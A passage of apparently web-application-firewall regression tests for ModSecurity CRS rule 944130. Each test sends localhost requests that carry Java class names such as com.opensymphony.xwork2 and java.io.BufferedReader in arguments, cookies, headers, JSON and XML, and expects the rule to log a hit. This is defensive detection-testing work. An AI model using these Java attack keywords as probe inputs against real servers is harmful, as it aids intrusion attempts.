"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-9 + desc: "Content-Type application/json arg value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"com.opensymphony.xwork2\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-10 + desc: "Content-Type application/json arg name includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"com.opensymphony.xwork2\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-11 + desc: "Argument test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-12 + desc: "Argument name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "com.sun.org.apache=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-13 + desc: "Cookie test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.sun.org.apache + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-14 + desc: "Cookie name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.sun.org.apache=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-15 + desc: "Request header test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.sun.org.apache + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-16 + desc: "XML attribute value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-17 + desc: "XML element value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-18 + desc: "Nested XML element value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-19 + desc: "Content-Type text/plain includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-20 + desc: "Content-Type application/json arg value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"com.sun.org.apache\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-21 + desc: "Content-Type application/json arg name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"com.sun.org.apache\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-22 + desc: "Argument test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-23 + desc: "Argument name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-24 + desc: "Cookie test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedInputStream + method: 
"POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-25 + desc: "Cookie name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-26 + desc: "Request header test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-27 + desc: "XML attribute value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + 
log_contains: "id \"944130\"" + - test_title: 944130-28 + desc: "XML element value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-29 + desc: "Nested XML element value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-30 + desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-31 + desc: "Content-Type application/json arg value includes 
keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-32 + desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.BufferedInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-33 + desc: "Argument test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-34 + desc: "Argument name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-35 + desc: "Cookie test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-36 + desc: "Cookie name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-37 + desc: "Request header test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-38 + desc: "XML attribute value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-39 + desc: "XML element value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-40 + desc: "Nested XML element value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-41 + desc: "Content-Type text/plain includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-42 + desc: "Content-Type application/json arg value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-43 + desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.BufferedReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-44 + desc: "Argument test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-45 + desc: "Argument name includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-46 + desc: "Cookie test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-47 + desc: "Cookie name includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-48 + desc: "Request header test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-49 + desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-50 + desc: "XML element value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-51 + desc: "Nested XML element value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-52 + desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-53 + desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-54 + desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: 